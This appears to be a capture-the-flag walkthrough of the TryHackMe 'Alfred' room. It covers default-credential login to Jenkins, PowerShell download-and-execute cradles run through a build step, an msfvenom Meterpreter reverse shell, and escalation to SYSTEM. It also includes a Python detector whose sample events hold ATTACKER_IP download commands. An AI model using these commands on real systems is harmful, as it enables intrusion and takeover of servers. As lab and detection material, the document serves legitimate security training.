TryHackMe Alfred – How I Solved The Challenge [+Video]


In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a Jenkins instance running on Windows, find a way to carry out Remote Command Execution (RCE), use Metasploit to gain access to the box, and escalate my privileges to NT AUTHORITY\SYSTEM, which is the equivalent of root on a Windows machine.

⚔️ Challenge: I need to capture two “flags”, the user.txt flag and the root.txt flag. Let’s get started!

First, we’ll note down our IP addresses, export them as shell variables, and run an Nmap scan with the -Pn flag to skip host discovery (the target does not answer ping probes).


export myIP=
export targetIP=

└─$ nmap -Pn
Starting Nmap 7.93 ( ) at 2022-12-10 22:39 EST
Nmap scan report for
Host is up (0.083s latency).
Not shown: 997 filtered tcp ports (no-response)
80/tcp   open  http
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds

The scan shows three open ports.

There is an HTTP service on port 80, presumably a website, which we’ll open in the browser in a moment.

The ms-wbt-server on port 3389 looks interesting. A quick Google search reveals that this service name is associated with the Remote Desktop Protocol (RDP).

The http-proxy on 8080 also looks intriguing. On port 80 we find a picture of Batman in plain clothes; there’s not much to see here, and a quick look at the HTML source doesn’t reveal anything else of interest.


On port 8080, we find a login page to Jenkins.

Let’s take a few guesses with some standard default credentials: admin:password, admin:admin, etc.

Using the proxy’s intercept and sending the login request to the Intruder function, we can set up a list of usernames and passwords to try in a sniper-style attack.

Based on the differing response lengths, we can see that admin:admin is likely our winning combination. We are in luck that this company’s administrators never changed the default credentials and don’t properly safeguard their business! The system lets us in as expected with admin:admin.

At TryHackMe’s suggestion, we’ll use Nishang to spawn a reverse shell from Windows. Inside the Jenkins admin dashboard, we click on project 1 and then on Configure.

In the last text box of the build configuration, we can perform remote command execution.


First, let’s spawn a reverse shell using PowerShellTcp.ps1 from Nishang’s GitHub repository. After downloading the script, we launch a Netcat listener with the command:

nc -lnvp 8888

Then we use the following command in the last text box of the Jenkins project 1 settings.

powershell iex (New-Object Net.WebClient).DownloadString('')

After clicking Build in the Jenkins dashboard, we catch the shell on our Netcat listener and discover the user.txt flag!
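On the defensive side, here is an added detection example (my own, not from the TryHackMe room or the Nishang project) that scans constructed Windows process-creation events for the two PowerShell download cradles used in this walkthrough: the IEX/DownloadString one-liner above and the DownloadFile drop used later for shell.exe. It assumes Sysmon Event ID 1 field names and that Jenkins runs from its default install path.

```python
import re

# Regexes applied case-insensitively to the full powershell.exe command line.
RULES = {
    # iex (New-Object Net.WebClient).DownloadString('...')  -- the Nishang cradle
    "download_cradle": re.compile(
        r"(\biex\b|invoke-expression).*downloadstring"
        r"|downloadstring.*(\biex\b|invoke-expression)", re.I | re.S),
    # (New-Object System.Net.WebClient).DownloadFile('...','shell.exe')
    "file_drop": re.compile(r"downloadfile\s*\(", re.I),
}
# Assumption: Jenkins build steps run from a path containing "Jenkins".
JENKINS_HINT = re.compile(r"jenkins", re.I)

# Constructed sample events (Sysmon Event ID 1 field names, placeholder IPs).
SAMPLE_EVENTS = [
    {"RecordId": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r"cmd /c call C:\Program Files (x86)\Jenkins\workspace\project\jenkins.bat",
     "CommandLine": "powershell iex (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8000/PowerShellTcp.ps1')"},
    {"RecordId": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r"cmd /c call C:\Program Files (x86)\Jenkins\workspace\project\jenkins.bat",
     "CommandLine": "powershell \"(New-Object System.Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/shell.exe','shell.exe')\""},
    {"RecordId": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "ParentCommandLine": "svchost.exe -k netsvcs -p -s Schedule",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"},  # benign
    {"RecordId": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": r"C:\Windows\Explorer.EXE",
     "CommandLine": "powershell.exe -nop -w hidden iex ((New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/a.ps1'))"},
]


def classify(event):
    """Return [(rule_name, severity)] hits for one process-creation event."""
    if not event.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    parent = event.get("ParentImage", "") + " " + event.get("ParentCommandLine", "")
    # A cradle launched from a Jenkins build step is the RCE primitive shown
    # in this walkthrough, so it is rated higher than one started by a user.
    severity = "high" if JENKINS_HINT.search(parent) else "medium"
    cmd = event.get("CommandLine", "")
    return [(name, severity) for name, rx in RULES.items() if rx.search(cmd)]


def scan(events):
    """Flatten hits across events as (RecordId, rule_name, severity) tuples."""
    return [(e["RecordId"], name, sev) for e in events for name, sev in classify(e)]


if __name__ == "__main__":
    for rec, name, sev in scan(SAMPLE_EVENTS):
        print(f"record {rec}: {name} ({sev})")
```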



We can create a custom payload with msfvenom that connects back to a more powerful Meterpreter reverse shell in Metasploit, using the following command on our attack box:

sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST= LPORT=4444 -f exe -o shell.exe

Now we need to start the Metasploit console:


Load the generic payload handler, exploit/multi/handler:

use exploit/multi/handler

Set up our payload:

set payload windows/meterpreter/reverse_tcp

And finally, type run to start the handler.

Next, we’ll spin up a simple HTTP server so the Windows target can fetch shell.exe:

python -m http.server 8000

Then we can download and run the file on the target machine, again using remote command execution via the Jenkins build configuration:

powershell "(New-Object System.Net.WebClient).Downloadfile('','shell.exe')"

Metasploit then launches a new Meterpreter session on the target box. If the HTTP server log shows that shell.exe was fetched successfully (status code 200) but no Meterpreter session is spawned, we can use one more Jenkins RCE to run the reverse shell:



First, we issue the following command in Meterpreter to automatically escalate to the highest privilege available:


We now operate with NT AUTHORITY\SYSTEM privileges for most things, but not for every single command. To fix this, we migrate into another process on the target machine.

Entering the command ps lists the running processes. We’ll migrate into the process system.exe with the following command:

migrate <PID> (the process ID of the target process running as NT AUTHORITY\SYSTEM, in this case system.exe)

Our Meterpreter session now runs inside the system.exe process in the target’s memory. We have full NT AUTHORITY\SYSTEM privileges and can easily locate root.txt with the following commands:

search -f root.txt

cat root.txt

Thanks for reading/watching my walkthrough. 🙏